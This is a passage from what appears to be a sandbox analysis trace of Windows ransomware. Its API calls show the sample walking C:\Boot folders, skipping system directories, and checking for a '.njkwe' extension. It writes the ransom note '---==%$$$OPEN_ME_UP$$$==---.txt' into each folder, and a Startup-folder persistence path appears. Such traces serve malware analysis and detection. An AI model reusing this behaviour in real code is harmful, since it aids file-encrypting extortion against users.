ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.088] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.088] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.088] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0065.088] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.088] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.088] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.088] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.088] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.088] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.088] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.088] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0065.088] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.088] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.088] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.088] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.088] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.089] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.089] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.089] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.089] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.089] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.089] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.089] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui") returned 33 [0065.089] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.089] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.089] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.089] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.089] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.089] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.089] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0065.089] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.089] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\hu-hu\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.091] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.092] CloseHandle (hObject=0x428) returned 1 [0065.092] GetProcessHeap () returned 0xbe0000 [0065.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.092] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0065.092] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0065.092] lstrcmpiW (lpString1="it-IT", lpString2="$Recycle.bin") returned 1 [0065.092] lstrcmpiW (lpString1="it-IT", lpString2="System Volume Information") returned -1 [0065.092] lstrcmpiW (lpString1="it-IT", lpString2="Program Files") returned -1 [0065.092] lstrcmpiW (lpString1="it-IT", lpString2="Program Files (x86)") returned -1 [0065.092] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0065.092] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0065.092] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0065.092] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.092] GetProcessHeap () returned 0xbe0000 [0065.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.092] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0065.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f20 [0065.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.093] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.093] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.093] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.093] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.093] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0065.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.093] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.093] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.093] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.093] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.093] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.093] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.093] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0065.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.093] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.093] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0065.093] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.093] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.093] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.093] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.093] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.094] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.094] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.094] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.094] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.094] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.094] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.094] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui") returned 33 [0065.094] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.094] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.094] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.094] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.094] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.094] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.094] FindClose (in: hFindFile=0xc19f20 | out: hFindFile=0xc19f20) returned 1 [0065.094] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.095] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\it-it\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.097] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.098] CloseHandle (hObject=0x428) returned 1 [0065.098] GetProcessHeap () returned 0xbe0000 [0065.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.098] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0065.098] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0065.098] lstrcmpiW (lpString1="ja-JP", lpString2="$Recycle.bin") returned 1 [0065.098] lstrcmpiW (lpString1="ja-JP", lpString2="System Volume Information") returned -1 [0065.098] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files") returned -1 [0065.098] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files (x86)") returned -1 [0065.098] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0065.098] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0065.098] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0065.098] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ja-JP", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.098] GetProcessHeap () returned 0xbe0000 [0065.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.098] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0065.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0065.098] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.098] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.098] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.098] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.098] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.098] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0065.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.098] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.099] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.099] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.099] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.099] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.099] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.099] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0065.099] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.099] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.099] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.099] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.099] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.099] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.099] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.099] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.099] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0065.099] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.099] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.099] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.099] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.099] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.099] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.099] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.099] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.099] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.099] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.099] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.099] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui") returned 33 [0065.099] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.099] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.100] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.100] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.100] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.100] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.100] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0065.100] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.100] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\ja-jp\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.117] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.118] CloseHandle (hObject=0x428) returned 1 [0065.119] GetProcessHeap () returned 0xbe0000 [0065.119] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.119] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, 